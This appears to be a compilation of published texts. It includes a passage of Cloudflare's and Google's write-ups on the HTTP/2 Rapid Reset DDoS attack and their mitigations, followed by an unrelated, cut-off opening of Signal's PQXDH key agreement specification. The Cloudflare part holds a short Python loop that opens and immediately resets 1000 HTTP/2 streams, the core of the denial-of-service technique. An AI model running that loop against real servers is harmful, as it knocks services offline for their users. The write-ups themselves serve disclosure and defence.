Applying this lifecycle back into the context of concurrency, HTTP/2 states:

Streams that are in the “open” state or in either of the “half-closed” states count toward the maximum number of streams that an endpoint is permitted to open. Streams in any of these three states count toward the limit advertised in the SETTINGS_MAX_CONCURRENT_STREAMS setting.

In theory, the concurrency limit is useful. However, there are practical factors that hamper its effectiveness, which we will cover later in the blog.

HTTP/2 request cancellation

Earlier, we talked about client cancellation of in-flight requests. HTTP/2 supports this in a much more efficient way than HTTP/1.1. Rather than needing to tear down the whole connection, a client can send a RST_STREAM frame for a single stream. This instructs the server to stop processing the request and to abort the response, which frees up server resources and avoids wasting bandwidth.

Let’s consider our previous example of 3 requests. This time the client cancels the request on stream 1 after all of the HEADERS have been sent. The server parses this RST_STREAM frame before it is ready to serve the response, and instead responds only to streams 3 and 5.

Request cancellation is a useful feature. For example, when scrolling a webpage with multiple images, a web browser can cancel images that fall outside the viewport, meaning that images entering it can load faster. HTTP/2 makes this behaviour a lot more efficient compared to HTTP/1.1.

A request stream that is canceled rapidly transitions through the stream lifecycle. The client’s HEADERS with END_STREAM flag set to 1 transitions the state from idle to open to half-closed; RST_STREAM then immediately causes a transition from half-closed to closed.

Recall that only streams that are in the open or half-closed state contribute to the stream concurrency limit. When a client cancels a stream, it instantly gets the ability to open another stream in its place and can send another request immediately. This is the crux of what makes CVE-2023-44487 work.

Rapid resets leading to denial of service

HTTP/2 request cancellation can be abused to rapidly reset an unbounded number of streams. When an HTTP/2 server is able to process client-sent RST_STREAM frames and tear down state quickly enough, such rapid resets do not cause a problem. Where issues start to crop up is when there is any kind of delay or lag in tidying up. The client can churn through so many requests that a backlog of work accumulates, resulting in excess consumption of resources on the server.
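
As a rough illustration, the HEADERS-plus-RST_STREAM churn described above can be sketched with the Python h2 library in a few lines. This is a minimal sketch for load-testing a server you operate, not the attackers’ tooling; the TLS socket setup (ALPN “h2”) is omitted.

    import h2.connection
    import h2.errors

    conn = h2.connection.H2Connection()  # client-side by default
    conn.initiate_connection()
    headers = [(":method", "GET"), (":path", "/"),
               (":scheme", "https"), (":authority", "example.com")]
    for _ in range(1000):
        stream_id = conn.get_next_available_stream_id()
        conn.send_headers(stream_id, headers, end_stream=True)  # idle -> half-closed
        conn.reset_stream(stream_id, error_code=h2.errors.ErrorCodes.CANCEL)
    payload = conn.data_to_send()  # bytes to write to a TLS socket negotiated for h2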

A common HTTP deployment architecture is to run an HTTP/2 proxy or load-balancer in front of other components. When a client request arrives it is quickly dispatched and the actual work is done as an asynchronous activity somewhere else. This allows the proxy to handle client traffic very efficiently. However, this separation of concerns can make it hard for the proxy to tidy up the in-process jobs. Therefore, these deployments are more likely to encounter issues from rapid resets.

When Cloudflare’s reverse proxies process incoming HTTP/2 client traffic, they copy the data from the connection’s socket into a buffer and process that buffered data in order. As each request is read (HEADERS and DATA frames) it is dispatched to an upstream service. When RST_STREAM frames are read, the local state for the request is torn down and the upstream is notified that the request has been canceled. Rinse and repeat until the entire buffer is consumed. However this logic can be abused: when a malicious client started sending an enormous chain of requests and resets at the start of a connection, our servers would eagerly read them all and create stress on the upstream servers to the point of being unable to process any new incoming request.

Something that is important to highlight is that stream concurrency on its own cannot mitigate rapid reset. The client can churn requests to create high request rates no matter the server’s chosen value of SETTINGS_MAX_CONCURRENT_STREAMS.

Rapid Reset dissected

Here’s an example of rapid reset reproduced using a proof-of-concept client attempting to make a total of 1000 requests. I’ve used an off-the-shelf server without any mitigations, listening on port 443 in a test environment. The traffic is dissected using Wireshark and filtered to show only HTTP/2 traffic for clarity. Download the pcap to follow along.

It’s a bit difficult to see, because there are a lot of frames. We can get a quick summary via Wireshark’s Statistics > HTTP2 tool:

The first frame in this trace, in packet 14, is the server’s SETTINGS frame, which advertises a maximum stream concurrency of 100. In packet 15, the client sends a few control frames and then starts making requests that are rapidly reset. The first HEADERS frame is 26 bytes long, all subsequent HEADERS are only 9 bytes. This size difference is due to a compression technology called HPACK. In total, packet 15 contains 525 requests, going up to stream 1051.

Interestingly, the RST_STREAM for stream 1051 doesn’t fit in packet 15, so in packet 16 we see the server respond with a 404 response.  Then in packet 17 the client does send the RST_STREAM, before moving on to sending the remaining 475 requests.

Note that although the server advertised 100 concurrent streams, both client packets contained far more HEADERS frames than that. The client did not have to wait for any return traffic from the server; it was limited only by the size of the packets it could send. No server RST_STREAM frames are seen in this trace, indicating that the server did not observe a concurrent stream violation.

Impact on customers

As mentioned above, as requests are canceled, upstream services are notified and can abort requests before wasting too many resources on them. This was the case with this attack: most malicious requests were never forwarded to the origin servers. However, the sheer size of these attacks did cause some impact.

First, as the rate of incoming requests reached peaks never seen before, we had reports of increased levels of 502 errors seen by clients. This happened on our most impacted data centers as they were struggling to process all the requests. While our network is meant to deal with large attacks, this particular vulnerability exposed a weakness in our infrastructure. Let’s dig a little deeper into the details, focusing on how incoming requests are handled when they hit one of our data centers:

We can see that our infrastructure is composed of a chain of different proxy servers with different responsibilities. In particular, when a client connects to Cloudflare to send HTTPS traffic, it first hits our TLS decryption proxy: it decrypts TLS traffic, processes HTTP 1, 2 or 3 traffic, then forwards it to our “business logic” proxy. This one is responsible for loading all the settings for each customer, then routing the requests correctly to other upstream services — and more importantly in our case, it is also responsible for security features. This is where L7 attack mitigation is processed.

The problem with this attack vector is that it manages to send a lot of requests very quickly in every single connection. Each of them had to be forwarded to the business logic proxy before we had a chance to block it. As the request throughput became higher than our proxy capacity, the pipe connecting these two services reached its saturation level in some of our servers.

When this happens, the TLS proxy can no longer connect to its upstream proxy; this is why some clients saw a bare “502 Bad Gateway” error during the most serious attacks. It is important to note that, as of today, the logs used to create HTTP analytics are also emitted by our business logic proxy. The consequence is that these errors are not visible in the Cloudflare dashboard. Our internal dashboards show that about 1% of requests were impacted during the initial wave of attacks (before we implemented mitigations), with peaks at around 12% for a few seconds during the most serious one on August 29th. The following graph shows the ratio of these errors over a two-hour period while this was happening:

We worked to reduce this number dramatically in the following days, as detailed later in this post. Thanks both to changes in our stack and to mitigations that considerably reduce the size of these attacks, this number today is effectively zero.

499 errors and the challenges for HTTP/2 stream concurrency

Another symptom reported by some customers is an increase in 499 errors. The reason for this is a bit different and is related to the maximum stream concurrency in a HTTP/2 connection detailed earlier in this post.

HTTP/2 settings are exchanged at the start of a connection using SETTINGS frames. In the absence of an explicit parameter, default values apply. Once a client establishes an HTTP/2 connection, it can either wait for the server’s SETTINGS (slow) or assume the default values and start making requests (fast). For SETTINGS_MAX_CONCURRENT_STREAMS, the default is effectively unlimited (stream IDs use a 31-bit number space, and requests use odd numbers, so the actual limit is 1073741824). The specification recommends that a server offer no fewer than 100 streams. Clients are generally biased towards speed, so they don’t tend to wait for server settings, which creates a bit of a race condition. Clients are taking a gamble on what limit the server might pick; if they pick wrong, the request will be rejected and will have to be retried. Gambling on 1073741824 streams is a bit silly. Instead, a lot of clients decide to limit themselves to issuing 100 concurrent streams, in the hope that servers follow the specification’s recommendation. Where servers pick something below 100, this client gamble fails and streams are reset.

There are many reasons a server might reset a stream beyond overstepping the concurrency limit. HTTP/2 is strict and requires a stream to be closed when there are parsing or logic errors. In 2019, Cloudflare developed several mitigations in response to HTTP/2 DoS vulnerabilities. Several of those vulnerabilities were caused by a client misbehaving, leading the server to reset a stream. A very effective strategy to clamp down on such clients is to count the number of server resets during a connection, and when that exceeds some threshold value, close the connection with a GOAWAY frame. Legitimate clients might make one or two mistakes in a connection and that is acceptable. A client that makes too many mistakes is probably either broken or malicious, and closing the connection addresses both cases.
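
A minimal sketch of that counting strategy, with an illustrative threshold and a hypothetical connection object whose close_connection() hook sends the GOAWAY:

    RESET_THRESHOLD = 50  # illustrative; real deployments tune this per service

    class StreamResetGuard:
        """Counts server-initiated stream resets on one connection."""
        def __init__(self):
            self.server_resets = 0

        def on_server_reset(self, conn) -> None:
            self.server_resets += 1
            if self.server_resets > RESET_THRESHOLD:
                # Too many misbehaving streams: end the connection with GOAWAY.
                conn.close_connection()  # hypothetical hook on the h2 connection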

While responding to DoS attacks enabled by CVE-2023-44487, Cloudflare reduced maximum stream concurrency to 64. Before making this change, we were unaware that clients don’t wait for SETTINGS and instead assume a concurrency of 100. Some web pages, such as an image gallery, do indeed cause a browser to send 100 requests immediately at the start of a connection. Unfortunately, the 36 streams above our limit all needed to be reset, which triggered our counting mitigations. This meant that we closed connections on legitimate clients, leading to a complete page load failure. As soon as we realized this interoperability issue, we changed the maximum stream concurrency to 100.

Actions from the Cloudflare side

In 2019 several DoS vulnerabilities were uncovered related to implementations of HTTP/2. Cloudflare developed and deployed a series of detections and mitigations in response. CVE-2023-44487 is a different manifestation of an HTTP/2 vulnerability. However, to mitigate it, we were able to extend the existing protections to monitor client-sent RST_STREAM frames and close connections when they are being used for abuse. Legitimate client uses of RST_STREAM are unaffected.

In addition to this direct fix, we have implemented several improvements to the server’s HTTP/2 frame processing and request dispatch code. The business logic server has also received improvements to queuing and scheduling that reduce unnecessary work and improve cancellation responsiveness. Together these lessen the impact of various potential abuse patterns and give the server more room to process requests before saturating.

Mitigate attacks earlier

Cloudflare already had systems in place to efficiently mitigate very large attacks with less expensive methods. One of them is named “IP Jail”. For hyper volumetric attacks, this system collects the client IPs participating in the attack and stops them from connecting to the attacked property, either at the IP level, or in our TLS proxy. This system however needs a few seconds to be fully effective; during these precious seconds, the origins are already protected but our infrastructure still needs to absorb all HTTP requests. As this new botnet has effectively no ramp-up period, we need to be able to neutralize attacks before they can become a problem.

To achieve this, we expanded the IP Jail system to protect our entire infrastructure: once an IP is “jailed”, not only is it blocked from connecting to the attacked property, we also forbid the corresponding IPs from using HTTP/2 to any other domain on Cloudflare for some time. Because such protocol abuses are not possible over HTTP/1.x, this limits the attacker’s ability to run large attacks, while any legitimate client sharing the same IP would see only a very small performance decrease during that time. IP-based mitigations are a very blunt tool, which is why we have to be extremely careful when using them at that scale and seek to avoid false positives as much as possible. Moreover, the lifespan of a given IP in a botnet is usually short, so any long-term mitigation is likely to do more harm than good. The following graph shows the churn of IPs in the attacks we witnessed:

As we can see, many new IPs spotted on a given day disappear very quickly afterwards.

As all these actions happen in our TLS proxy at the beginning of our HTTPS pipeline, this saves considerable resources compared to our regular L7 mitigation system. This allowed us to weather these attacks much more smoothly and now the number of random 502 errors caused by these botnets is down to zero.

Observability improvements

Another front on which we are making changes is observability. Returning errors to clients without their being visible in customer analytics is unsatisfactory. Fortunately, a project has been underway to overhaul these systems since long before the recent attacks. It will eventually allow each service within our infrastructure to log its own data, instead of relying on our business logic proxy to consolidate and emit log data. This incident underscored the importance of this work, and we are redoubling our efforts.

We are also working on better connection-level logging, allowing us to spot such protocol abuses much more quickly to improve our DDoS mitigation capabilities.

Conclusion

While this was the latest record-breaking attack, we know it won’t be the last. As attacks continue to become more sophisticated, Cloudflare works relentlessly to proactively identify new threats — deploying countermeasures to our global network so that our millions of customers are immediately and automatically protected.

Cloudflare has provided free, unmetered and unlimited DDoS protection to all of our customers since 2017. In addition, we offer a range of additional security features to suit the needs of organizations of all sizes. Contact us if you’re unsure whether you’re protected or want to understand how you can be.


Source :
https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/

How it works: The novel HTTP/2 ‘Rapid Reset’ DDoS attack

October 10, 2023

Juho Snellman
Staff Software Engineer

Daniele Iamartino
Staff Site Reliability Engineer

A number of Google services and Cloud customers have been targeted with a novel HTTP/2-based DDoS attack which peaked in August. These attacks were significantly larger than any previously-reported Layer 7 attacks, with the largest attack surpassing 398 million requests per second.

The attacks were largely stopped at the edge of our network by Google’s global load balancing infrastructure and did not lead to any outages. While the impact was minimal, Google’s DDoS Response Team reviewed the attacks and added additional protections to further mitigate similar attacks. In addition to Google’s internal response, we helped lead a coordinated disclosure process with industry partners to address the new HTTP/2 vector across the ecosystem.


Below, we explain the predominant methodology for Layer 7 attacks over the last few years, what changed in these new attacks to make them so much larger, and the mitigation strategies we believe are effective against this attack type. This article is written from the perspective of a reverse proxy architecture, where the HTTP request is terminated by a reverse proxy that forwards requests to other services. The same concepts apply to HTTP servers that are integrated into the application server, but with slightly different considerations which potentially lead to different mitigation strategies.

A primer on HTTP/2 for DDoS

Since late 2021, the majority of Layer 7 DDoS attacks we’ve observed across Google first-party services and Google Cloud projects protected by Cloud Armor have been based on HTTP/2, both by number of attacks and by peak request rates.

A primary design goal of HTTP/2 was efficiency, and unfortunately the features that make HTTP/2 more efficient for legitimate clients can also be used to make DDoS attacks more efficient.

Stream multiplexing

HTTP/2 uses “streams”, bidirectional abstractions used to transmit various messages, or “frames”, between the endpoints. “Stream multiplexing” is the core HTTP/2 feature which allows higher utilization of each TCP connection. Streams are multiplexed in a way that can be tracked by both sides of the connection while only using one Layer 4 connection. Stream multiplexing enables clients to have multiple in-flight requests without managing multiple individual connections.

One of the main constraints when mounting a Layer 7 DoS attack is the number of concurrent transport connections. Each connection carries a cost, including operating system memory for socket records and buffers, CPU time for the TLS handshake, as well as each connection needing a unique four-tuple, the IP address and port pair for each side of the connection, constraining the number of concurrent connections between two IP addresses.

In HTTP/1.1, each request is processed serially. The server will read a request, process it, write a response, and only then read and process the next request. In practice, this means that the rate of requests that can be sent over a single connection is one request per round trip, where a round trip includes the network latency, proxy processing time and backend request processing time. While HTTP/1.1 pipelining is available in some clients and servers to increase a connection’s throughput, it is not prevalent amongst legitimate clients.

With HTTP/2, the client can open multiple concurrent streams on a single TCP connection, each stream corresponding to one HTTP request. The maximum number of concurrent open streams is, in theory, controllable by the server, but in practice clients may open as many as 100 concurrent streams per connection, and servers process these requests in parallel. It’s important to note that server limits cannot be unilaterally adjusted.

For example, the client can open 100 streams and send a request on each of them in a single round trip; the proxy will read and process each stream serially, but the requests to the backend servers can again be parallelized. The client can then open new streams as it receives responses to the previous ones. This gives an effective throughput for a single connection of 100 requests per round trip, with similar round trip timing constants to HTTP/1.1 requests. This will typically lead to almost 100 times higher utilization of each connection.
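
The arithmetic behind that claim, worked through with an assumed 50 ms round trip:

    rtt = 0.050                     # assumed 50 ms round trip
    http1_rate = 1 / rtt            # one request per round trip  -> 20 req/s
    http2_rate = 100 / rtt          # 100 streams per round trip  -> 2,000 req/s
    print(http2_rate / http1_rate)  # ~100x higher utilization per connection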

The HTTP/2 Rapid Reset attack

The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way; the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed.

This attack is called Rapid Reset because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open.

Figure: HTTP/1.1 and HTTP/2 request and response pattern

The HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately.

The ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth.

In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client.

Another advantage the attacker gains is that the explicit cancellation of requests immediately after creation means that a reverse proxy server won’t send a response to any of the requests. Canceling the requests before a response is written reduces downlink (server/proxy to attacker) bandwidth.

HTTP/2 Rapid Reset attack variants

In the weeks after the initial DDoS attacks, we have seen some Rapid Reset attack variants. These variants are generally not as efficient as the initial version was, but might still be more efficient than standard HTTP/2 DDoS attacks.

The first variant does not immediately cancel the streams, but instead opens a batch of streams at once, waits for some time, then cancels those streams and immediately opens another large batch of new streams. This attack may bypass mitigations that are based on just the rate of inbound RST_STREAM frames (such as allowing at most 100 RST_STREAMs per second on a connection before closing it).

These attacks lose the main advantage of the canceling attacks by not maximizing connection utilization, but still have some implementation efficiencies over standard HTTP/2 DDoS attacks. But this variant does mean that any mitigation based on rate-limiting stream cancellations should set fairly strict limits to be effective.

The second variant does away with canceling streams entirely, and instead optimistically tries to open more concurrent streams than the server advertised. The benefit of this approach over the standard HTTP/2 DDoS attack is that the client can keep the request pipeline full at all times, and eliminate client-proxy RTT as a bottleneck. It can also eliminate the proxy-server RTT as a bottleneck if the request is to a resource that the HTTP/2 server responds to immediately.

RFC 9113, the current HTTP/2 RFC, suggests that an attempt to open too many streams should invalidate only the streams that exceeded the limit, not the entire connection. We believe that most HTTP/2 servers will not process those excess streams; this is what enables the non-cancelling attack variant, since the server accepts and processes a new stream almost immediately after responding to a previous one.

A multifaceted approach to mitigations

We don’t expect that simply blocking individual requests is a viable mitigation against this class of attacks — instead the entire TCP connection needs to be closed when abuse is detected. HTTP/2 provides built-in support for closing connections, using the GOAWAY frame type. The RFC defines a process for gracefully closing a connection that involves first sending an informational GOAWAY that does not set a limit on opening new streams, and one round trip later sending another that forbids opening additional streams.

However, this graceful GOAWAY process is usually not implemented in a way which is robust against malicious clients. This form of mitigation leaves the connection vulnerable to Rapid Reset attacks for too long, and should not be used for building mitigations as it does not stop the inbound requests. Instead, the GOAWAY should be set up to limit stream creation immediately.

This leaves the question of deciding which connections are abusive. A client canceling requests is not inherently abusive; the feature exists in the HTTP/2 protocol to help better manage request processing. Typical situations are when a browser no longer needs a resource it had requested because the user navigated away from the page, or applications using a long-polling approach with a client-side timeout.

Mitigations for this attack vector can take multiple forms, but mostly center around tracking connection statistics and using various signals and business logic to determine how useful each connection is. For example, if a connection has more than 100 requests with more than 50% of the given requests canceled, it could be a candidate for a mitigation response. The magnitude and type of response depend on the risk to each platform, but responses can range from forceful GOAWAY frames, as discussed before, to closing the TCP connection immediately.
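
A minimal sketch of such a heuristic, using the illustrative figures from the example above (the thresholds and the eventual response hook are deployment-specific choices, not part of any published implementation):

    class ConnStats:
        """Tracks per-connection request and cancellation counts."""
        def __init__(self):
            self.requests = 0
            self.cancels = 0

        def on_request(self) -> None:
            self.requests += 1

        def on_rst_stream(self) -> None:
            self.cancels += 1

        def looks_abusive(self) -> bool:
            # More than 100 requests with more than 50% of them canceled.
            return self.requests > 100 and self.cancels > self.requests / 2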

To mitigate against the non-cancelling variant of this attack, we recommend that HTTP/2 servers should close connections that exceed the concurrent stream limit. This can be either immediately or after some small number of repeat offenses.

Applicability to other protocols

We do not believe these attack methods translate directly to HTTP/3 (QUIC) due to protocol differences, and Google does not currently see HTTP/3 used as a DDoS attack vector at scale. Despite that, our recommendation is for HTTP/3 server implementations to proactively implement mechanisms to limit the amount of work done by a single transport connection, similar to the HTTP/2 mitigations discussed above.

Industry coordination

Early in our DDoS Response Team’s investigation and in coordination with industry partners, it was apparent that this new attack type could have a broad impact on any entity offering the HTTP/2 protocol for their services. Google helped lead a coordinated vulnerability disclosure process taking advantage of a pre-existing coordinated vulnerability disclosure group, which has been used for a number of other efforts in the past.

During the disclosure process, the team focused on notifying large-scale implementers of HTTP/2 including infrastructure companies and server software providers. The goal of these prior notifications was to develop and prepare mitigations for a coordinated release. In the past, this approach has enabled widespread protections to be enabled for service providers or available via software updates for many packages and solutions.

During the coordinated disclosure process, we reserved CVE-2023-44487 to track fixes to the various HTTP/2 implementations.

Next steps

The novel attacks discussed in this post can have significant impact on services of any scale. All providers who have HTTP/2 services should assess their exposure to this issue. Software patches and updates for common web servers and programming languages may be available to apply now or in the near future. We recommend applying those fixes as soon as possible.

For our customers, we recommend patching software and enabling the Application Load Balancer and Google Cloud Armor, which has been protecting Google and existing Google Cloud Application Load Balancing users.

Source :
https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack

The PQXDH Key Agreement Protocol

Revision 1, 2023-05-24 [PDF]

Ehren Kret, Rolfe Schmidt

Table of Contents

1. Introduction

This document describes the “PQXDH” (or “Post-Quantum Extended Diffie-Hellman”) key agreement protocol. PQXDH establishes a shared secret key between two parties who mutually authenticate each other based on public keys. PQXDH provides post-quantum forward secrecy and a form of cryptographic deniability but still relies on the hardness of the discrete log problem for mutual authentication in this revision of the protocol.

PQXDH is designed for asynchronous settings where one user (“Bob”) is offline but has published some information to a server. Another user (“Alice”) wants to use that information to send encrypted data to Bob, and also establish a shared secret key for future communication.

2. Preliminaries

2.1. PQXDH parameters

An application using PQXDH must decide on several parameters:

Name       Definition
curve      A Montgomery curve for which XEdDSA [1] is specified; at present this is one of curve25519 or curve448
hash       A 256 or 512-bit hash function (e.g. SHA-256 or SHA-512)
info       An ASCII string identifying the application with a minimum length of 8 bytes
pqkem      A post-quantum key encapsulation mechanism (e.g. CRYSTALS-Kyber-1024 [2])
EncodeEC   A function that encodes a curve public key into a byte sequence
DecodeEC   A function that decodes a byte sequence into a curve public key and is the inverse of EncodeEC
EncodeKEM  A function that encodes a pqkem public key into a byte sequence
DecodeKEM  A function that decodes a byte sequence into a pqkem public key and is the inverse of EncodeKEM

For example, an application could choose curve as curve25519, hash as SHA-512, info as “MyProtocol”, and pqkem as CRYSTALS-KYBER-1024.

The recommended implementation of EncodeEC consists of a single-byte constant representation of curve followed by little-endian encoding of the u-coordinate as specified in [3]. The single-byte representation of curve is defined by the implementer. Similarly the recommended implementation of DecodeEC reads the first byte to determine the parameter curve. If the first byte does not represent a recognized curve, the function fails. Otherwise it applies the little-endian decoding of the u-coordinate for curve as specified in [3].

The recommended implementation of EncodeKEM consists of a single-byte constant representation of pqkem followed by the encoding of PQKPK specified by pqkem. The single-byte representation of pqkem is defined by the implementer. Similarly the recommended implementation of DecodeKEM reads the first byte to determine the parameter pqkem. If the first byte does not represent a recognized key encapsulation mechanism, the function fails. Otherwise it applies the decoding specified by the selected key encapsulation mechanism.
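
A minimal Python sketch of the recommended EncodeEC and DecodeEC for curve25519, with a hypothetical single-byte tag (the tag value is implementer-defined):

    CURVE25519_TAG = 0x01  # illustrative; the single-byte value is implementer-defined

    def encode_ec(u_le: bytes) -> bytes:
        # 32-byte little-endian u-coordinate as specified in [3] (RFC 7748)
        return bytes([CURVE25519_TAG]) + u_le

    def decode_ec(data: bytes) -> bytes:
        if not data or data[0] != CURVE25519_TAG:
            raise ValueError("unrecognized curve")
        if len(data) != 33:
            raise ValueError("bad length for a curve25519 public key")
        return data[1:]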

2.2. Cryptographic notation

Throughout this document, all public keys have a corresponding private key, but to simplify descriptions we will identify key pairs by the public key and assume that the corresponding private key can be accessed by the key owner.

This document will use the following notation:

  • The concatenation of byte sequences X and Y is X || Y.
  • DH(PK1, PK2) represents a byte sequence which is the shared secret output from an Elliptic Curve Diffie-Hellman function involving the key pairs represented by public keys PK1 and PK2. The Elliptic Curve Diffie-Hellman function will be either the X25519 or X448 function from [3], depending on the curve parameter.
  • Sig(PK, M, Z) represents the byte sequence that is a curve XEdDSA signature on the byte sequence M which was created by signing M with PK’s corresponding private key and using 64 bytes of randomness Z. This signature verifies with public key PK. The signing and verification functions for XEdDSA are specified in [1].
  • KDF(KM) represents 32 bytes of output from the HKDF algorithm [4] using hash with the following inputs (a minimal sketch follows this list):
    • HKDF input key material = F || KM, where KM is an input byte sequence containing secret key material, and F is a byte sequence containing 32 0xFF bytes if curve is curve25519, and 57 0xFF bytes if curve is curve448. As in XEdDSA [1], F ensures that the first bits of the HKDF input key material are never a valid encoding of a scalar or elliptic curve point.
    • HKDF salt = A zero-filled byte sequence with length equal to the hash output length, in bytes.
    • HKDF info = The concatenation of string representations of the 4 PQXDH parameters info, curve, hash, and pqkem into a single string separated with ‘_’ such as “MyProtocol_CURVE25519_SHA-512_CRYSTALS-KYBER-1024”. The string representations of the PQXDH parameters are defined by the implementer.
  • (CT, SS) = PQKEM-ENC(PK) represents a tuple of the byte sequence that is the KEM ciphertext, CT, output by the algorithm pqkem together with the shared secret byte sequence SS encapsulated by the ciphertext using the public key PK.
  • PQKEM-DEC(PK, CT) represents the shared secret byte sequence SS decapsulated from a pqkem ciphertext using the private key counterpart of the public key PK used to encapsulate the ciphertext CT.
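
A minimal sketch of KDF for the example parameters (curve25519, SHA-512, and the info string above), using the Python cryptography package:

    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.kdf.hkdf import HKDF

    F = b"\xff" * 32  # 32 0xFF bytes for curve25519
    INFO = b"MyProtocol_CURVE25519_SHA-512_CRYSTALS-KYBER-1024"

    def kdf(km: bytes) -> bytes:
        return HKDF(
            algorithm=hashes.SHA512(),
            length=32,
            salt=b"\x00" * 64,  # zero-filled, SHA-512 output length
            info=INFO,
        ).derive(F + km)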

2.3. Roles

The PQXDH protocol involves three parties: Alice, Bob, and a server.

  • Alice wants to send Bob some initial data using encryption, and also establish a shared secret key which may be used for bidirectional communication.
  • Bob wants to allow parties like Alice to establish a shared key with him and send encrypted data. However, Bob might be offline when Alice attempts to do this. To enable this, Bob has a relationship with some server.
  • The server can store messages from Alice to Bob which Bob can later retrieve. The server also lets Bob publish some data which the server will provide to parties like Alice. The amount of trust placed in the server is discussed in Section 4.9.

In some systems the server role might be divided between multiple entities, but for simplicity we assume a single server that provides the above functions for Alice and Bob.

2.4. Elliptic Curve Keys

PQXDH uses the following elliptic curve public keys:

Name               Definition
IKA                Alice’s identity key
IKB                Bob’s identity key
EKA                Alice’s ephemeral key
SPKB               Bob’s signed prekey
(OPKB1, OPKB2, …)  Bob’s set of one-time prekeys

The elliptic curve public keys used within a PQXDH protocol run must either all be in curve25519 form, or they must all be in curve448 form, depending on the curve parameter [3].

Each party has a long-term identity elliptic curve public key (IKA for Alice, IKB for Bob).

Bob also has a signed prekey SPKB, which he changes periodically and signs each time with IKB, and a set of one-time prekeys (OPKB1, OPKB2, …), which are each used in a single PQXDH protocol run. (“Prekeys” are so named because they are essentially protocol messages which Bob publishes to the server prior to Alice beginning the protocol run.) These keys will be uploaded to the server as described in Section 3.2.

During each protocol run, Alice generates a new ephemeral key pair with public key EKA.

2.5. Post-Quantum Key Encapsulation Keys

PQXDH uses the following post-quantum key encapsulation public keys:

Name                   Definition
PQSPKB                 Bob’s signed last-resort pqkem prekey
(PQOPKB1, PQOPKB2, …)  Bob’s set of signed one-time pqkem prekeys

The pqkem public keys used within a PQXDH protocol run must all use the same pqkem parameter.

Bob has a signed last-resort post-quantum prekey PQSPKB, which he changes periodically and signs each time with IKB, and a set of signed one-time prekeys (PQOPKB1, PQOPKB2, …), which are also signed with IKB and each used in a single PQXDH protocol run. These keys will be uploaded to the server as described in Section 3.2. The name “last-resort” refers to the fact that the last-resort prekey is only used when one-time pqkem prekeys are not available. This can happen when the number of prekey bundles downloaded for Bob exceeds the number of one-time pqkem prekeys Bob has uploaded (see Section 3 for details about the role of the server).

3. The PQXDH protocol

3.1. Overview

PQXDH has three phases:

  1. Bob publishes his elliptic curve identity key, elliptic curve prekeys, and pqkem prekeys to a server.
  2. Alice fetches a “prekey bundle” from the server, and uses it to send an initial message to Bob.
  3. Bob receives and processes Alice’s initial message.

The following sections explain these phases.

3.2. Publishing keys

Bob generates a sequence of 64-byte random values ZSPK, ZPQSPK, Z1, Z2, … and publishes a set of keys to the server containing:

  • Bob’s curve identity key IKB
  • Bob’s signed curve prekey SPKB
  • Bob’s signature on the curve prekey Sig(IKB, EncodeEC(SPKB), ZSPK)
  • Bob’s signed last-resort pqkem prekey PQSPKB
  • Bob’s signature on the pqkem prekey Sig(IKB, EncodeKEM(PQSPKB), ZPQSPK)
  • A set of Bob’s one-time curve prekeys (OPKB1, OPKB2, OPKB3, …)
  • A set of Bob’s signed one-time pqkem prekeys (PQOPKB1, PQOPKB2, PQOPKB3, …)
  • The set of Bob’s signatures on the signed one-time pqkem prekeys (Sig(IKB, EncodeKEM(PQOPKB1), Z1), Sig(IKB, EncodeKEM(PQOPKB2), Z2), Sig(IKB, EncodeKEM(PQOPKB3), Z3), …)

Bob only needs to upload his identity key to the server once. However, Bob may upload new one-time prekeys at other times (e.g. when the server informs Bob that the server’s store of one-time prekeys is getting low).

For both the signed curve prekey and the signed last-resort pqkem prekey, Bob will upload a new prekey along with its signature using IKB at some interval (e.g. once a week or once a month). The new signed prekey and its signatures will replace the previous values.

After uploading a new pair of signed curve and signed last-resort pqkem prekeys, Bob may keep the private key corresponding to the previous pair around for some period of time to handle messages using it that may have been delayed in transit. Eventually, Bob should delete this private key for forward secrecy (one-time prekey private keys will be deleted as Bob receives messages using them; see Section 3.4).

3.3. Sending the initial message

To perform a PQXDH key agreement with Bob, Alice contacts the server and fetches a “prekey bundle” containing the following values:

  • Bob’s curve identity key IKB
  • Bob’s signed curve prekey SPKB
  • Bob’s signature on the curve prekey Sig(IKB, EncodeEC(SPKB), ZSPK)
  • One of either Bob’s signed one-time pqkem prekey PQOPKBn or Bob’s last-resort signed pqkem prekey PQSPKB if no signed one-time pqkem prekey remains. Call this key PQPKB.
  • Bob’s signature on the pqkem prekey Sig(IKB, EncodeKEM(PQPKB), ZPQPK)
  • (Optionally) Bob’s one-time curve prekey OPKBn

The server should provide one of Bob’s curve one-time prekeys if one exists and then delete it. If all of Bob’s curve one-time prekeys on the server have been deleted, the bundle will not contain a one-time curve prekey element.

The server should prefer to provide one of Bob’s pqkem one-time signed prekeys PQOPKBn if one exists and then delete it. If all of Bob’s pqkem one-time signed prekeys on the server have been deleted, the bundle will instead contain Bob’s pqkem last-resort signed prekey PQSPKB.

Alice verifies the signatures on the prekeys. If any signature check fails, Alice aborts the protocol. Otherwise, if all signature checks pass, Alice then generates an ephemeral curve key pair with public key EKA. Alice additionally generates a pqkem encapsulated shared secret:

    (CT, SS) = PQKEM-ENC(PQPKB)    ; ciphertext CT, encapsulated shared secret SS

If the bundle does not contain a curve one-time prekey, she calculates:

    DH1 = DH(IKA, SPKB)
